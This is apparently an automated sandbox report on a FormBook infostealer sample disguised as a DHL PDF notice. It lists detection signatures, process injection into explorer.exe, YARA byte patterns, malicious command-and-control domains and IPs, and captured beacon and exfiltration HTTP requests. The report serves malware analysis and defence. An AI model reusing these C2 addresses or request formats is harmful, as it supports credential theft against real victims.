Windows Analysis Report
DHL_Notice_pdf.exe

Overview

General Information

Sample Name: DHL_Notice_pdf.exe
Analysis ID: 831175
MD5: 771508cf2751f6dabe05758e4fa25fdf
SHA1: f6d7d33b6a340d2c370ca31a6f9677a2e5306486
SHA256: 652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL_Notice_pdf.exe (PID: 2080 cmdline: C:\Users\user\Desktop\DHL_Notice_pdf.exe MD5: 771508CF2751F6DABE05758E4FA25FDF)
    • zkvixbqxp.exe (PID: 6136 cmdline: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
      • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • zkvixbqxp.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe MD5: BE5A6985BCDCA9064A05D26CFB8D082E)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5080 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x19e08:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x198a4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19f0a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a082:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc7ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18aff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fb7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20b2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      3.2.zkvixbqxp.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        3.2.zkvixbqxp.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x1ffc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1920a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.zkvixbqxp.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x19008:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18aa4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1910a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19282:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17cff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.zkvixbqxp.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          3.2.zkvixbqxp.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp: 03/21/23-08:08:13.337564
          Traffic: 192.168.2.3:51139 -> 8.8.8.8:53
          SID: 2023883
          Source Port: 51139
          Destination Port: 53
          Protocol: UDP
          Classtype: Potentially Bad Traffic

          AV Detection

          Source: DHL_Notice_pdf.exe | ReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exe | Virustotal: Detection: 42%
          Source: Yara match | File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== | Avira URL Cloud: Label: malware
          Source: http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X | Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyz/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfd/hpb7/ | Avira URL Cloud: Label: phishing
          Source: http://www.amirah.cfd | Avira URL Cloud: Label: phishing
          Source: http://www.0dhy.xyz/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X | Avira URL Cloud: Label: malware
          Source: http://www.admet01.club | Avira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/j | Avira URL Cloud: Label: malware
          Source: http://www.traindic.top | Avira URL Cloud: Label: malware
          Source: http://www.yongleproducts.com/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.admet01.club/hpb7/ | Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyz | Avira URL Cloud: Label: malware
          Source: bohndigitaltech.com | Virustotal: Detection: 5%
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe | ReversingLabs: Detection: 27%
          Source: DHL_Notice_pdf.exe | Joe Sandbox ML: detected
          Source: 1.2.zkvixbqxp.exe.9f0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL_Notice_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: DHL_Notice_pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose | 0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe | Code function: 0_2_0040290B FindFirstFileW | 0_2_0040290B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose | 5_2_027D31A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe | Code function: 4x nop then xor ebx, ebx | 3_2_0040DCB4
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 5_2_027C8D70
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then xor ebx, ebx | 5_2_027CBEC1

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exe | Domain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exe | Domain query: www.traindic.top
          Source: C:\Windows\explorer.exe | Network Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exe | Network Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exe | Network Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exe | Network Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exe | Network Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exe | Domain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exe | Domain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exe | Network Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exe | Domain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exe | Domain query: www.kunimi.org
          Source: C:\Windows\explorer.exe | Domain query: www.amirah.cfd
          Source: C:\Windows\explorer.exe | Domain query: www.bisarropainting.com
          Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
          Source: C:\Windows\explorer.exe | DNS query: www.0dhy.xyz
          Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox View | ASN Name: PRIVATESYSTEMSUS PRIVATESYSTEMSUS
          Source: global traffic | HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1 | Host: www.yongleproducts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 | Host: www.0dhy.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1 | Host: www.kunimi.org | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 | Host: www.traindic.top | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1 | Host: www.bohndigitaltech.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 | Host: www.rifleroofers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1 | Host: www.denko-kosan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View | IP Address: 198.46.160.97 198.46.160.97
          Source: Joe Sandbox View | IP Address: 67.222.24.48 67.222.24.48
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 
4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 59 46 77 38 58 7e 4f 28 31 79 4e 51 79 76 5a 74 59 66 63 78 2d 31 50 78 62 4e 58 62 56 32 6f 28 48 46 63 43 48 33 79 49 51 63 49 33 50 6f 5a 4c 55 38 35 71 5a 44 6a 77 71 77 66 37 34 41 63 59 54 58 41 63 43 75 79 46 34 4d 4d 64 53 4b 65 6c 6f 6f 34 35 59 56 30 4a 34 54 44 6b 57 6a 35 36 66 58 34 7a 45 76 53 6f 30 56 58 37 75 67 46 30 53 79 73 62 71 50 33 75 2d 78 74 4d 70 46 6f 57 54 4b 74 4a 72 4f 30 6e 36 32 43 59 70 54 6e 32 31 75 41 47 6e 54 36 75 73 77 53 76 4c 67 42 66 33 57 4b 46 69 5a 61 75 64 4f 75 32 4a 68 59 79 52 42 4f 63 37 71 48 47 52 4a 62 72 55 56 42 47 79 6f 31 75 72 30 64 5a 30 37 45 63 57 36 56 64 6f 62 57 71 59 39 7a 4f 55 54 4f 78 6e 7e 5a 33 65 61 78 30 69 49 61 69 37 77 46 4f 72 33 47 41 33 4d 36 39 48 48 55 72 47 36 46 38 39 33 34 48 53 39 45 4b 72 58 6d 38 68 59 38 74 55 6c 48 67 32 6e 4e 59 42 61 37 74 71 4b 70 32 54 49 4d 37 5f 34 35 7a 75 43 61 47 32 42 51 4c 46 65 74 66 74 59 48 71 77 4c 6f 73 6b 33 6c 73 78 73 6f 66 4d 78 42 6e 4c 51 4b 72 43 6b 67 6c 38 6e 68 4b 6b 69 52 76 31 67 5a 47 55 51 47 79 66 70 33 35 55 4f 54 50 55 55 54 66 6a 47 6b 53 4e 38 47 55 46 47 52 4b 4f 33 58 64 66 61 6d 7e 50 46 77 67 75 49 4d 36 69 65 63 4f 6c 4e 7a 54 61 4c 6e 37 52 75 51 4c 57 46 76 6d 4f 7e 6d 7e 65 47 45 62 58 62 4f 30 32 72 37 61 44 6c 62 69 31 4b 71 4b 32 50 37 44 47 69 38 79 37 49 79 58 32 46 46 77 6c 54 76 47 34 54 4a 56 38 39 71 79 74 57 31 70 4d 62 4d 31 55 49 5a 69 5f 48 35 61 32 64 30 33 6c 36 72 37 4c 30 67 57 61 4b 61 41 56 74 55 4e 45 76 58 39 5a 37 7a 6f 4a 6d 
4f 74 54 33 6d 58 49 31 61 73 78 48 30 66 62 4e 4e 6a 70 4c 46 66 58 4b 75 4b 39 71 72 78 75 6d 5a 33 51 51 64 52 35 6e 53 50 45 4c 75 78 67 57 6c 6b 45 7e 31 42 37 5a 4c 55 58 71 4e 72 4a 69 38 4c 52 38 42 69 65 4b 4c 63 41 75 79 70 6e 7a 71 71 71 76 6f 46 46 77 46 6e 78 77 6d 76 66 42 67 34 37 63 75 43 48 70 41 46 69 38 55 57 75 59 77 54 49 4a 49 52 5a 28 52 41 53 4e 51 46 4f 52 77 76 6d 45 69 68 74 62 6b 61 59 6c 74 67 34 35 6f 62 6b 7e 47 46 76 49 2d 71 76 31 5a 45 57 65 46 58 45 68 6b 34 59 46 61 30 42 33 4c 47 4b 72 4f 42 41 51 57 58 30 7a 34 37 4c 73 46 32 66 70 61 54 70 45 36 53 59 36 52 61 5f 77 43 6d 37 64 4b 7e 68 58 53 58 67 4c 58 66 63 4a 47 79 47 42 74 47 6a 34 6b 66 63 66 6a 62 52 6d 79 28 46 53 33 76 35 52 6a 68 64 6b 59 4b 4f 62 30 7e 52 71 69 6e 4e 50 30 75 34 38 41 31 4e 28 6f 64 63 61 67 57 4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
